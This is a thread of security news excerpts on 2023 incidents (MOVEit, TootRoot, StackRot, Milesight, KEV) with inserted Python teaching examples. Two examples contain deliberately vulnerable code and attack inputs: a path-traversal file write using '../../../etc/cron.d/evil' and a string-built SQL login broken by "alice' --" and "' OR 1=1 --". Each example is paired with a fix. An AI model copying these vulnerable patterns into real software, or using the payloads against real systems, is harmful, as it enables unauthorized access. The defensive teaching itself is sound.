Gcore Radar is a quarterly report prepared by Gcore that provides insights into the current state of the DDoS protection market and cybersecurity trends.
This report offers you an understanding of the evolving threat landscape and highlights the measures required to protect against attacks effectively. It serves as an insight for businesses and individuals seeking to stay informed about the latest developments in cybersecurity.
As we entered 2023, the cybersecurity landscape witnessed an increase in sophisticated, high-volume attacks. Here, we present the current state of the DDoS protection market based on Gcore’s statistics.
Tomi Engdahl says:
Malicious ad for USPS fishes for banking credentials https://www.malwarebytes.com/blog/threat-intelligence/2023/07/malicious-ad-for-usps-phishes-for-jpmorgan-chase-credentials
We often think of malvertising as being malicious ads that push malware or scams, and quite rightly so these are probably the most common payloads.
However, malvertising is also a great vehicle for phishing attacks which we usually see more often via spam emails.
Threat actors continue to abuse and impersonate brands, posing as verified advertisers whose only purpose is to smuggle rogue ads via popular search engines. In this blog post, we review a recent phishing attack that was targeting both mobile and Desktop users looking up to track their packages via the United States Postal Service website.
Tomi Engdahl says:
Taking over Milesight UR32L routers behind a VPN: 22 vulnerabilities and a full chain https://blog.talosintelligence.com/talos-discovers-17-vulnerabilities-in-milesight/
Cisco Talos recently discovered several vulnerabilities in Milesight‘s UR32L – an ARMv7 Linux-based industrial cellular router — and Milesight’s MilesightVPN, a remote access solution for Milesight devices.
In all, Cisco Talos is releasing 22 security advisories today, nine of which have a CVSS score greater than 8, associated with 69 CVEs. Talos is disclosing these vulnerabilities despite no official fix from Milesight, in adherence to Cisco’s vulnerability disclosure policy. Milesight did not respond appropriately during the 90-day period as outlined in the policy.
Tomi Engdahl says:
Researchers Uncover New Linux Kernel ‘StackRot’ Privilege Escalation Vulnerability https://thehackernews.com/2023/07/researchers-uncover-new-linux-kernel.html
Details have emerged about a newly identified security flaw in the Linux kernel that could allow a user to gain elevated privileges on a target host.
Dubbed StackRot (CVE-2023-3269, CVSS score: 7.8), the flaw impacts Linux versions 6.1 through 6.4. There is no evidence that the shortcoming has been exploited in the wild to date.
“As StackRot is a Linux kernel vulnerability found in the memory management subsystem, it affects almost all kernel configurations and requires minimal capabilities to trigger,” Peking University security researcher Ruihan Li said.
“However, it should be noted that maple nodes are freed using RCU callbacks, delaying the actual memory deallocation until after the RCU grace period. Consequently, exploiting this vulnerability is considered challenging.”
Tomi Engdahl says:
The Register: Microsoft puts out Outlook fire, says ‘everything’s fine’ with Teams malware flaw > https://go.theregister.com/feed/www.theregister.com/2023/07/06/microsoft_outlook_teams_flaws/, 2023-07-06 21:20:10 +0000
Tomi Engdahl says:
Wired Threat Level: How Threads’ Privacy Policy Compares to Twitter’s (and Its Rivals’) > https://www.wired.com/story/meta-twitter-threads-bluesky-spill-hive-mastodon-privacy-comparison/, 2023-07-06 23:46:55 +0000
Tomi Engdahl says:
Truebot RCE attacks exploit critical Netwrix Auditor bug https://www.scmagazine.com/news/threat-intelligence/truebot-rce-critical-netwrix-bug
Organizations in the U.S. and Canada are being targeted by new versions of the Truebot downloader trojan botnet, adapted to exploit a critical remote code execution (RCE) vulnerability in Netwrix Auditor software.
TrueBot, also known as Silence.Downloader, has been tied to a suspected Russian threat operation Silence, which is linked to Evil Corp and the TA505 threat cluster. The Clop ransomware gang, recently in the headlines for its attacks on MOVEit Transfer users, is among those who have previously used Truebot to exfiltrate data from victims.
Truebot variants have previously been delivered primarily via malicious phishing email attachments, the advisory said. With the newly observed versions, however, access to compromised systems can also be gained by exploiting a now-patched RCE vulnerability in Netwrix Auditor, a tool for tracking and analyzing changes in IT environments.
Tomi Engdahl says:
Mastodon fixes critical “TootRoot” vulnerability allowing node hijacking https://arstechnica.com/security/2023/07/mastodon-fixes-critical-tootroot-vulnerability-allowing-node-hijacking/
The maintainers of the open source software that powers the Mastodon social network published a security update on Thursday that patches a critical vulnerability making it possible for hackers to backdoor the servers that push content to individual users.
“Using carefully crafted media files, attackers can cause Mastodon’s media processing code to create arbitrary files at any location,” Mastodon said.
“This allows attackers to create and overwrite any file Mastodon has access to, allowing Denial of Service and arbitrary Remote Code Execution.”
In a Mastodon post, independent security researcher Kevin Beaumont went a step further, writing that exploiting the vulnerability allowed someone “to send a toot which makes a webshell on instances that process said toot.” He coined the name #TootRoot because user posts, known as toots, allowed hackers to potentially gain root access to instances.
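The bug class behind the quote above is an attacker-influenced path reaching a file write. As an added, generic illustration (not Mastodon's code, and not the actual TootRoot trigger), the following compares a target-path computation that trusts the supplied file name with one that derives the on-disk name server-side and verifies the resolved path stays under the storage root. The storage root, extension whitelist and input names are constructed for the example.

```python
import os
import uuid
from typing import Optional

# Hypothetical storage root; the file names used below are constructed inputs.
STORAGE_ROOT = "/var/app/media"
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".mp4", ".webm"}


def escapes_root(root: str, path: str) -> bool:
    """True if `path`, after resolving '..' and symlinks, lies outside `root`."""
    real_root = os.path.realpath(root)
    real_path = os.path.realpath(path)
    return os.path.commonpath([real_root, real_path]) != real_root


def vulnerable_target(user_filename: str) -> str:
    """Bug class: the supplied name decides where the file is written.
    '..' segments walk out of STORAGE_ROOT and an absolute name replaces it."""
    return os.path.normpath(os.path.join(STORAGE_ROOT, user_filename))


def hardened_target(user_filename: str, token: Optional[str] = None) -> str:
    """Use the supplied name only to pick a whitelisted extension; the basename
    is generated server-side and the final path is checked against the root."""
    ext = os.path.splitext(os.path.basename(user_filename))[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"rejected extension {ext!r}")
    token = token or uuid.uuid4().hex  # caller may pass a fixed token for tests
    target = os.path.join(STORAGE_ROOT, token + ext)
    if escapes_root(STORAGE_ROOT, target):
        # Unreachable with a generated basename, but cheap defence in depth.
        raise ValueError("path escapes storage root")
    return target


if __name__ == "__main__":
    for name in ("cat.png", "../../../etc/cron.d/evil", "/etc/passwd"):
        t = vulnerable_target(name)
        print(f"{name!r:30} -> {t}  escapes={escapes_root(STORAGE_ROOT, t)}")
    print(hardened_target("../../../etc/cron.d/evil.png", token="0123abcd"))
```

The check in escapes_root is the reusable part: resolve both sides with realpath before comparing, otherwise a symlink inside the media directory defeats a plain string-prefix test.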
Tomi Engdahl says:
CISA warns govt agencies to patch actively exploited Android driver https://www.bleepingcomputer.com/news/security/cisa-warns-govt-agencies-to-patch-actively-exploited-android-driver/
CISA ordered federal agencies today to patch a high-severity Arm Mali GPU kernel driver privilege escalation flaw added to its list of actively exploited vulnerabilities and addressed with this month’s Android security updates.
The flaw (tracked as CVE-2021-29256) is a use-after-free weakness that can let attackers escalate to root privileges or gain access to sensitive information on targeted Android devices by allowing improper operations on GPU memory.
U.S. Federal Civilian Executive Branch Agencies (FCEB) have been given until July 28th to secure their devices against attacks targeting the CVE-2021-29256 vulnerability added to CISA’s list of Known Exploited Vulnerabilities today.
According to the binding operational directive (BOD 22-01) issued in November 2021, federal agencies are bound to thoroughly assess and address any security flaws outlined in CISA’s KEV catalog.
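A practical way to act on the BOD 22-01 requirement described above is to diff your own vulnerability findings against the KEV catalog and compute the remaining time to each due date. The following is an added example, not CISA tooling: the catalog excerpt is a constructed sample in the shape of the published KEV JSON feed (the live file is at https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json, and its dates are the authoritative ones), the scanner findings are made up, and the "today" value is an assumption.

```python
import json
from datetime import date
from typing import Dict, Set, Tuple

# Constructed sample mimicking the KEV feed's structure. The Mali dueDate is the
# July 28 deadline reported above; the MOVEit dates are illustrative and should
# be read from the live feed, not from here.
SAMPLE_KEV = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "catalogVersion": "2023.07.07",
    "count": 2,
    "vulnerabilities": [
        {
            "cveID": "CVE-2021-29256",
            "vendorProject": "Arm",
            "product": "Mali GPU Kernel Driver",
            "dateAdded": "2023-07-07",
            "dueDate": "2023-07-28",
            "requiredAction": "Apply updates per vendor instructions.",
        },
        {
            "cveID": "CVE-2023-34362",
            "vendorProject": "Progress",
            "product": "MOVEit Transfer",
            "dateAdded": "2023-06-02",
            "dueDate": "2023-06-23",
            "requiredAction": "Apply updates per vendor instructions.",
        },
    ],
})

# Constructed scanner output: CVE IDs still present somewhere in the fleet.
# CVE-2023-35036 is deliberately absent from the sample catalog above.
INVENTORY_FINDINGS: Set[str] = {"CVE-2021-29256", "CVE-2023-34362", "CVE-2023-35036"}

# Assumed evaluation date for the example.
ASSUMED_TODAY = date(2023, 7, 7)


def kev_exposure(kev_json: str, findings: Set[str], today: date) -> Dict[str, Tuple[date, int]]:
    """Map each finding that is in the KEV catalog to (dueDate, days remaining).
    Negative days mean the BOD 22-01 remediation deadline has already passed."""
    catalog = json.loads(kev_json)
    by_id = {v["cveID"]: v for v in catalog["vulnerabilities"]}
    exposure: Dict[str, Tuple[date, int]] = {}
    for cve in sorted(findings):
        entry = by_id.get(cve)
        if entry is None:
            continue  # present in the fleet but not (yet) a KEV entry
        due = date.fromisoformat(entry["dueDate"])
        exposure[cve] = (due, (due - today).days)
    return exposure


def report(kev_json: str, findings: Set[str], today: date) -> str:
    """One line per KEV-listed finding, flagging deadlines already missed."""
    lines = []
    for cve, (due, days) in kev_exposure(kev_json, findings, today).items():
        status = "OVERDUE" if days < 0 else f"{days} days left"
        lines.append(f"{cve}: due {due.isoformat()} ({status})")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_KEV, INVENTORY_FINDINGS, ASSUMED_TODAY))
```

Findings that are not in the catalog are skipped on purpose: KEV is a prioritisation floor, not a complete list of what needs patching, so they belong in the normal vulnerability-management queue rather than in this report.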
Tomi Engdahl says:
Solar monitoring systems exposed: Secure your devices https://www.malwarebytes.com/blog/news/2023/07/solar-monitoring-systems-exposed-secure-your-devices
Researchers who go looking for devices exposed to the Internet report “tens of thousands” of solar photovoltaic (PV) monitoring and diagnostic systems can be found on the web. The systems are used for everything from system optimization to performance monitoring and troubleshooting.
No fewer than 134,000 products from an assortment of vendors were found to be exposed, though as Bleeping Computer notes, this does not necessarily mean they’re all vulnerable right now.
Indeed, the research highlights that around 7,000 devices belonging to one particular brand are in the list. A separate report linked by Bleeping Computer found 425 examples of said device making use of a firmware version known to be vulnerable to attack. As per said report, which cleverly makes use of a copyright string on the product’s landing page to work out which versions are vulnerable:
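The report quoted above fingerprints firmware versions from a copyright string on the product's landing page. As an added example of that technique, not code from the report and not tied to the real product (the product name, version numbers, regular expression and page fragments here are all made up), the following extracts a version from such a string and classifies the device against an assumed first-fixed release.

```python
import re
from typing import Optional, Tuple

# Hypothetical product and fixed version; the real brand and version ranges
# from the report are not reproduced here.
PRODUCT = "ExampleSolar Monitor"
FIXED_IN: Tuple[int, int, int] = (2, 4, 0)  # assumed first non-vulnerable release

# Matches e.g. "&copy; 2019 ExampleSolar Monitor v2.3.1" or "Copyright ExampleSolar Monitor 1.9"
COPYRIGHT_RE = re.compile(
    r"(?:&copy;|©|copyright)\s*(?:\d{4}\s*)?"
    + re.escape(PRODUCT)
    + r"\s+v?(\d+)\.(\d+)(?:\.(\d+))?",
    re.IGNORECASE,
)

# Constructed landing-page fragments standing in for fetched HTTP responses.
PAGE_OLD = "<html><body><h1>Login</h1><footer>&copy; 2019 ExampleSolar Monitor v2.3.1</footer></body></html>"
PAGE_NEW = "<html><body><h1>Login</h1><footer>© 2023 ExampleSolar Monitor v2.4.2</footer></body></html>"
PAGE_NO_BANNER = "<html><body><h1>Welcome</h1></body></html>"


def extract_version(html: str) -> Optional[Tuple[int, int, int]]:
    """Pull (major, minor, patch) out of the copyright line; None if absent."""
    m = COPYRIGHT_RE.search(html)
    if not m:
        return None
    major, minor, patch = m.group(1), m.group(2), m.group(3) or "0"
    return int(major), int(minor), int(patch)


def classify(html: str) -> str:
    """'vulnerable' below FIXED_IN, 'patched' at or above it, 'unknown' if no banner."""
    version = extract_version(html)
    if version is None:
        return "unknown"
    return "vulnerable" if version < FIXED_IN else "patched"


if __name__ == "__main__":
    for label, page in (("old", PAGE_OLD), ("new", PAGE_NEW), ("none", PAGE_NO_BANNER)):
        print(f"{label}: version={extract_version(page)} -> {classify(page)}")
```

Tuple comparison does the version ordering, which avoids the classic mistake of comparing "2.10" and "2.9" as strings. An "unknown" result should be treated as unassessed rather than safe, since a vendor can change the banner without changing the vulnerable code.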
Tomi Engdahl says:
MOVEit Postmortem
https://explore.avertium.com/resource/moveit-postmortem
June 2023 marked the beginning of Progress Software’s MOVEit file transfer zero-days. The initial vulnerability, CVE-2023-34362, was identified as an SQL injection flaw that could lead to escalated privileges and unauthorized access to victims’ environments.
Shortly after discovering this, Progress found additional critical SQL injection vulnerabilities that could allow attackers to steal data from customer databases. Exploitation of these vulnerabilities could allow attackers to compromise internet-exposed servers and manipulate or extract customer information without authentication. The flaws are now tracked as CVE-2023-35708 and CVE-2023-35036.
Although Progress promptly released patches, the Clop ransomware gang proved even quicker, leading to the compromise of several companies in the subsequent weeks. Let’s dive into the ongoing devastation caused by the MOVEit vulnerabilities and the threat actor targeting organizations.
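The postmortem above describes SQL injection flaws that grant access without authentication. As an added, generic illustration of that bug class (this is not MOVEit's code and not the actual injection point of CVE-2023-34362), the following runs the same crafted input through a login query built by string formatting and through a parameterized one, against a constructed in-memory SQLite table.

```python
import sqlite3
from typing import Optional, Tuple

# Constructed database and credentials; nothing here is from a real system.


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, name: str, password: str) -> Optional[Tuple[str, str]]:
    """Bug: request values are pasted into the statement text, so a quote in
    `name` closes the literal and '--' comments out the password check."""
    sql = (
        "SELECT name, role FROM users "
        f"WHERE name = '{name}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchone()


def login_parameterized(conn: sqlite3.Connection, name: str, password: str) -> Optional[Tuple[str, str]]:
    """Fix: placeholders keep the values out of the SQL grammar; the same
    payload is compared as a plain string and matches no row."""
    sql = "SELECT name, role FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    for payload in ("alice' --", "' OR 1=1 --"):
        print(f"{payload!r:14} vulnerable={login_vulnerable(db, payload, 'wrong')}"
              f" parameterized={login_parameterized(db, payload, 'wrong')}")
```

The first payload logs in as a chosen user with no password; the second returns whatever row the database happens to yield first, which is how an unauthenticated attacker ends up holding an account they never named. Parameterization removes both outcomes without any input filtering.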
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/moveit-transfer-customers-warned-to-patch-new-critical-flaw/?fbclid=IwAR22SofsoTY1slDxaxxHym6CW-AdoXhLco6E6UPBJu1Ab6B6Beu2D6FFErc
Tomi Engdahl says:
ICS/OT
Vulnerabilities in PiiGAB Product Could Expose Industrial Organizations to Attacks
https://www.securityweek.com/vulnerabilities-in-piigab-product-could-expose-industrial-organizations-to-attacks/
Potentially serious vulnerabilities discovered by researchers in a PiiGAB product could expose industrial organizations to remote hacker attacks.
PiiGAB is a Sweden-based company that provides industrial and building automation hardware and software solutions.
Researchers Floris Hendriks and Jeroen Wijenbergh conducted an in-depth security assessment of PiiGAB’s M-Bus 900s gateway/converter as part of their master’s in cybersecurity at Radboud University in the Netherlands. The product is designed for the remote monitoring of devices using the M-Bus protocol.
“For example, the device is connected to electricity meters, water meters but also heat pumps, cooling units and PLC devices. This means that this product can be used to communicate with a large ecosystem of ICS devices,” the researchers told SecurityWeek.
The vendor has been notified and it has released updates that should address the security holes.
Tomi Engdahl says:
https://www.securityweek.com/iranian-cyberspies-target-us-based-think-tank-with-new-macos-malware/